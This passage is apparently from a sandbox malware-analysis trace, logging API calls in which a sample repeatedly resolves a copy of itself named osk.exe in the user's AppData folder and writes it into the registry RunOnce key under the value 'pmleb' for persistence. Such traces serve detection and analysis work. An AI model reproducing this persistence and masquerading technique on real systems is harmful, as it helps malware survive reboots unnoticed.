Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.223] IUnknown:Release (This=0x787518) returned 0x1 [0079.223] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.223] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.223] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.224] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.224] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 
0x80004002 [0079.224] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.224] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.224] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.224] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.224] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2d [0079.224] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.224] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x2e [0079.224] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, 
pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.225] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2d [0079.225] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.225] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.225] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.225] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.225] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.225] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.225] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.226] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, 
phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.226] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.226] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.226] RegCloseKey (hKey=0x280) returned 0x0 [0079.226] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.226] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.226] SetTimer (hWnd=0x20280, nIDEvent=0x202d, uElapse=0xa, lpTimerFunc=0x0) returned 0x202d [0079.226] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.238] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.238] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.238] KillTimer (hWnd=0x20280, uIDEvent=0x202d) returned 1 [0079.238] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.238] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 
[0079.238] IUnknown:Release (This=0x787518) returned 0x1 [0079.239] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.239] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.239] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.239] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.239] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.239] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, 
Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.239] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.239] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.239] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.239] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2e [0079.239] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.239] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x2f [0079.239] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), 
pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.240] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2e [0079.240] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.240] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.240] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.240] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.240] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.240] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.240] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.240] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.241] WideCharToMultiByte (in: 
CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.241] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.241] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.241] RegCloseKey (hKey=0x280) returned 0x0 [0079.241] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.241] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.241] SetTimer (hWnd=0x20280, nIDEvent=0x202e, uElapse=0xa, lpTimerFunc=0x0) returned 0x202e [0079.241] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.253] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.253] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.254] KillTimer (hWnd=0x20280, uIDEvent=0x202e) returned 1 [0079.254] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.254] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.254] IUnknown:Release (This=0x787518) returned 0x1 [0079.254] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, 
riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.254] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.254] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.254] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.254] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.255] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: 
ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.255] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.255] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.255] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.255] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2f [0079.255] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.255] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x30 [0079.255] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.256] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2f [0079.256] ??2@YAPAXI@Z () returned 0x2b51800 [0079.256] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.256] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.256] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.256] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.256] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.256] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.256] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.256] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.256] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.256] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.257] RegCloseKey (hKey=0x280) returned 0x0 [0079.257] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.257] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.257] SetTimer (hWnd=0x20280, nIDEvent=0x202f, 